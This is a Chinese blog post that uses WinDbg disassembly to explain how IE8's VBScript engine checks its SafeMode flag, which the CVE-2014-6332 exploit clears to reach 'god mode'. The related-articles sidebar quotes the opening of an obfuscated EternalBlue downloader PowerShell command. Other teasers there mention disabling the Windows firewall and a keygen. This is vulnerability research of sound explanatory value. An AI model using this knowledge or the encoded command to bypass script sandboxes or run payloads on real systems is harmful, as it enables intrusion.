IE-8 SafeMode Internal Analysis

最新推荐文章于 2022-05-17 11:52:25 发布
最新推荐文章于 2022-05-17 11:52:25 发布
阅读量297 收藏
点赞数
分类专栏: 心情杂货铺 文章标签: SafeMode VBScript IE 上帝模式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/102688610
版权

袁哥的cve-2014-6332poc脚本中利用构造的读写primitive关掉了IE的SafeMode,由于开启了上帝模式的IE利用VBS脚本来可以直接创建进程、读写文件等。

那么到底SafeMode是什么呢?

下面反汇编函数,是vbscript引擎用来判断是当前是否运行在安全模式的函数:

0: kd> uf vbscript!COleScript::InSafeMode
vbscript!COleScript::InSafeMode:
667fce4d f781740100000b000000 test dword ptr [ecx+174h],0Bh
667fce57 6a00            push    0
667fce59 58              pop     eax
667fce5a 0f95c0          setne   al
667fce5d c3              ret

ecx+0x174的值为0时,等于关闭了保护模式,开启了上帝模式。那么ecx的值从哪来的呢?

在windbg中下断点vbscript!COleScript::InSafeMode,断下后查看调用堆栈:

0: kd> kn
 # ChildEBP RetAddr  
00 01eecd38 66800fd3 vbscript!COleScript::InSafeMode
01 01eecdc4 66800f43 vbscript!GetObjectFromProgID+0x80
02 01eecdf4 66800eca vbscript!VbsCreateObject2+0x79
03 01eece10 667f3854 vbscript!VbsCreateObject+0x33

通过分析vbscript!VbsCreateObject2得知,ecx的值实际是vbscript!CScriptRuntime::GetCurrentOleScript函数的返回值

0: kd> u vbscript!VbsCreateObject2 L 30
vbscript!VbsCreateObject2:
66800ee6 8bff            mov     edi,edi
66800ee8 55              push    ebp
66800ee9 8bec            mov     ebp,esp
66800eeb 51              push    ecx
66800eec 8b4d08          mov     ecx,dword ptr [ebp+8]
66800eef 33c0            xor     eax,eax
66800ef1 40              inc     eax
66800ef2 668901          mov     word ptr [ecx],ax
66800ef5 39450c          cmp     dword ptr [ebp+0Ch],eax
66800ef8 0f8502060200    jne     vbscript!VbsCreateObject2+0x14 (66821500)
66800efe 57              push    edi
66800eff e80dbfffff      call    vbscript!CScriptRuntime::GetCurrentOleScript (667fce11)
66800f04 33ff            xor     edi,edi
66800f06 8945fc          mov     dword ptr [ebp-4],eax
...省略部分代码
66800f43 8b4dfc          mov     ecx,dword ptr [ebp-4]  ; ecx =  CurrentOleScript
66800f46 8bf0            mov     esi,eax
66800f48 e800bfffff      call    vbscript!COleScript::InSafeMode (667fce4d)

vbscript!CScriptRuntime::GetCurrentOleScript函数又是干嘛的呢?

0: kd> uf vbscript!CScriptRuntime::GetCurrentOleScript
vbscript!CScriptRuntime::GetCurrentOleScript:
667fce11 ff3584908466    push    dword ptr [vbscript!g_luTls (66849084)] ds:0023:66849084=0000004b
667fce17 ff15c8127f66    call    dword ptr [vbscript!_imp__TlsGetValue (667f12c8)]
667fce1d 85c0            test    eax,eax

1: kd> r eax
eax=01874180  ; GetTlsValue返回值

667fce1f 0f84a3d40100    je      vbscript!CScriptRuntime::GetCurrentOleScript+0x10 (6681a2c8)
667fce25 8b400c          mov     eax,dword ptr [eax+0Ch]
667fce28 c3              ret

1: kd> r eax
eax=069e9ac8   ; 传给InSafeMode函数的参数,也就是我们要找的ecx的值

继续分析得知GetCurrentOleScript返回值,实际是 【GetTlsValue() + 0xC】得到的!GetTlsValue的参数是0x4B

GetTlsValue函数是线程局部存储函数,用来读取当前线程中保存的Tls对应槽的变量,0x4B == Tls槽

GetTlsValue函数分析:

KERNELBASE!TlsGetValue:
75666818 8bff            mov     edi,edi
7566681a 55              push    ebp
7566681b 8bec            mov     ebp,esp
7566681d 64a118000000    mov     eax,dword ptr fs:[00000018h] fs:003b:00000018=7ffd9000  ==  TEB
75666823 8b4d08          mov     ecx,dword ptr [ebp+8]   ; ecx = 0x4B  = TLS索引
75666826 83603400        and     dword ptr [eax+34h],0   ; 清空LastErrorValue
7566682a 83f940          cmp     ecx,40h				 ; 检查索引是否大于0x40
7566682d 0f83738c0000    jae     KERNELBASE!TlsGetValue+0x20 (7566f4a6)  ; 大于则跳
75666833 8b8488100e0000  mov     eax,dword ptr [eax+ecx*4+0E10h]  ; 小于0x40,直接读取(TEB.TlsSlots + 4 * 索引)     
7566683a 5d              pop     ebp
7566683b c20400          ret     4

大于0x40跳转的位置:

0: kd> u 7566f4a6
KERNELBASE!TlsGetValue+0x20:
7566f4a6 81f940040000    cmp     ecx,440h  ;判断是否小于0x440,小于则跳
7566f4ac 7205            jb      KERNELBASE!TlsGetValue+0x38 (7566f4b3)
7566f4ae e999c00100      jmp     KERNELBASE!TlsGetValue+0x28 (7568b54c)

小于0x440跳转的位置:
7566f4b3 8b80940f0000    mov     eax,dword ptr [eax+0F94h]  ; +0xf94 TEB.TlsExpansionSlots 从扩展槽中读取
7566f4b9 85c0            test    eax,eax
7566f4bb 0f84eedeffff    je      KERNELBASE!TlsGetValue+0x32 (7566d3af)
7566f4c1 8b848800ffffff  mov     eax,dword ptr [eax+ecx*4-100h]  ;  读取(扩展槽基址+4*槽索引-0x100)
7566f4c8 e96d73ffff      jmp     KERNELBASE!TlsGetValue+0x34 (7566683a)

总结:

IE的VBScript引擎中判断当前是否处于安全模式的方式,首先通过0x4B作为TLS槽,从TLS变量中获取CurrentOleScript对象, 这个CurrentOleScript对象偏移0x174的位置,就是判断是否在安全模式。

如果非0则不再安全模式!!

FFE4
关注
专栏目录
CVE-2014-6332调试分析
trap0D的专栏
12-01 1926
这个漏洞是一个IE浏览器里,vbs方面的漏洞,yuange首先放出了这个漏洞的完整dve的利用,接下来各个安全团队都出了比较好的分析报告。这个漏洞本身的原理算是比较传统,但是利用技术非常巧妙。置位safemode后,shellcode相当于用脚本语言直接编写,通用性稳定性极强。闲暇之余,也忍不住调试一下。 调试环境Win7+IE8,参考了瀚海源的精简版yuange POC,因为里面有加入了通过v
Objective-C错误码
liuzhuanshaonian的专栏
07-13 9894
Objective-C错误码
IE开启上帝模式
weixin_42539095的博客
11-25 233
SafeMode SafeMode 是 Windows 操作系统中针对安全的一种特殊模式,即安全模式。默认情况下 vbscript 脚本执行权限是非常低的,正是因为safemode 安全属性的限制(正常情况下该属性值为 0xE。),如若我们能通过一定方法修改掉此属性值改为0,即可绕过安全权限检查,即进入上帝模式。而且,经过调试发现在 COleScript 对象偏移 0x174(不同版本可能偏移不一样) 位置正是 SafeMode标志位(结论记住就行,前人逆向出来的经验)。 代码 <html> &
Java 8 Iterable.forEach()与foreach循环
p15097962069的博客
05-10 2029
Which of the following is better practice in Java 8? 以下哪种是Java 8中的最佳实践? Java 8: Java 8: joins.fo
hadoop-common2.7源码分析之ProtobufRpcEngine(RPC实现)
lzf的博客
02-13 1810
概述 ProtobufRpcEngine是在RPC通信过程中,使用ptotobuf作为数据交换格式的RPC实现类。 对ProtobufRpcEngine的源码分析将围绕RPC概念模型展开。 RPC概念模型  RPC调用流程如下: RPC 服务端通过 RpcServer 去导出(export)远程接口方法,而客户端通过 RpcClient 去导入(import)远程接口方法。 客户端...
malware analysis、Sandbox Principles、Design && Implementation
weixin_30279751的博客
04-27 3446
catalog 0. 引言 1. sandbox introduction 2. Sandboxie 3. seccomp(short for secure computing mode): API级沙箱 4. 利用do_syscall_trace一次性对所有系统调用进行Hook监控 5. cuckoo 6. Detux 7. remnux 8. Noriben Malwar...
[源码]underscore-1.8.3
weixin_30379531的博客
07-26 184
// Underscore.js 1.8.3 // http://underscorejs.org // (c) 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors // Underscore may be freely distributed...
oracle小知识点16-诊断事件diagnostic events
congse3359的博客
01-29 1745
诊断事件按作用大概可分为四种: 1.Dump diagnostic information on request立即转储诊断信息,可以是File headers (control file, redo log files, d...
hibernate-search-3.3.0.Final中文文档翻译及学习笔记(转)
先相信你自己,然后别人才会相信你。
01-10 264
开始只是自己看,没想到要翻译,从第四章开始进行翻译,主要章节基本全部进行了翻译。文档中前面是英文,后面是中文翻译,一一对应。 5、Tuning Lucene indexing performance. 2ch4. 34.3. Analysis 44.4. Bridges 44.4.1. Built-in bridges 44.4.2. Custom bridges 5Important ...
Cybersecurity Challenges In The Uptake Of Artifitial Intelligence in Autonomous Driving [1]
weixin_40928171的博客
05-17 1651
• State-of-the-art literature survey on AI • Mapping of AVs’ functions to their respective AI techniques • Analysis of cybersecurity vulnerabilities • Presentation of possible attack scenario • Presentation of challenges and corresponding recommendations
Solr入门之官方文档6.0阅读笔记系列(十)
筑梦者
09-06 5851
The Well-Configured Solr Instance 告诉你如何调节solr实例到最佳性能 Configuring solrconfig.xml solrconfig.xml的配置对solr工作的影响很大 能完成以下内容: request handlers, which process the requests to Solr, such as
What to account for when accounting for algorithms
weixin_42786150的博客
02-28 1647
What to account for when accounting for algorithms
3 ForkJoinPool 源码注释1
少伟的博客
01-20 440
package java.util.concurrent; import java.lang.Thread.UncaughtExceptionHandler; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.List; import java.util.concurrent.AbstractE...
Google搜索关键字
热门推荐
weixin_30359021的博客
01-06 89万+
\”inurl:\”Umbraco/#/login\” site:*edu\” \”site:ghostbin.com \” / \” \” \”site:hastebin.com \” / \” \” intitle:’index of’ \”error_log\” intitle:’index of’ \”access_log\” inurl:/certsrv/certrqus.as...
Python修改文件往指定行插入内容
Sven的忘却日记
07-11 1万+
需求:批量修改py脚本中的类属性,为类增加一个core = True新的属性 a.py class A(): description = &amp;quot;abc&amp;quot; 现在有一个1.txt文本,保存着需要修改的py文件中含有的description属性。 1.txt description = &amp;quot;abc&amp;quot; description = &amp;quot;123&amp;quot; 实现思
使用注册表关闭Windows防火墙
Sven的忘却日记
06-11 6632
#include "stdafx.h" #include &lt;windows.h&gt; int _tmain(int argc, _TCHAR* argv[]) { HKEY hKey = nullptr; LONG lRet = NULL; char* szSubkey = "SYSTEM\\CurrentControlSet\\services\\Shared...
还原永恒之蓝下载器PS脚本混淆
Sven的忘却日记
04-26 6063
注意:以下代码为真实永恒之蓝木马下载器恶意ps代码,请不要在真实机运行、测试以及调试!!! 下面代码取自了该病毒设置的计划任务 powershell.exe -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAG...
SouceInsight v4 注册机源码
Sven的忘却日记
09-22 4739
下面c++代码可以用来生成Source Insight v4.0的注册码,网络验证还需要各位自己去patch一下!~ #include "stdafx.h" #include &lt;windows.h&gt; int main() { byte serial_table[] = { 0x4b, 0x56, 0x39, 0x36, 0x47, 0x4d, 0x4a, 0x59, 0x48, ...
hdfs dfsadmin -safemode 命令
最新发布
05-13
`hdfs dfsadmin -safemode` 命令用于管理 HDFS 的安全模式。HDFS 的安全模式是一种特殊的模式,当 HDFS 集群出现故障或者需要进行维护时,可以手动进入安全模式以保护数据的完整性。在安全模式下,HDFS 的文件系统只允许读操作,不允许写操作。这可以防止在维护期间出现数据丢失或者损坏的情况。 使用 `hdfs dfsadmin -safemode` 命令可以查询当前 HDFS 集群的安全模式状态,以及进入或退出安全模式。具体命令和参数如下: - 查询当前 HDFS 集群的安全模式状态: ```bash hdfs dfsadmin -safemode get ``` - 进入安全模式: ```bash hdfs dfsadmin -safemode enter ``` - 退出安全模式: ```bash hdfs dfsadmin -safemode leave ``` - 强制退出安全模式: ```bash hdfs dfsadmin -safemode forceExit ``` 注意,进入安全模式后,需要手动退出安全模式才能进行写操作。在退出安全模式之前,需要保证 HDFS 集群的所有节点都处于正常状态,否则可能会出现数据丢失或者损坏的情况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值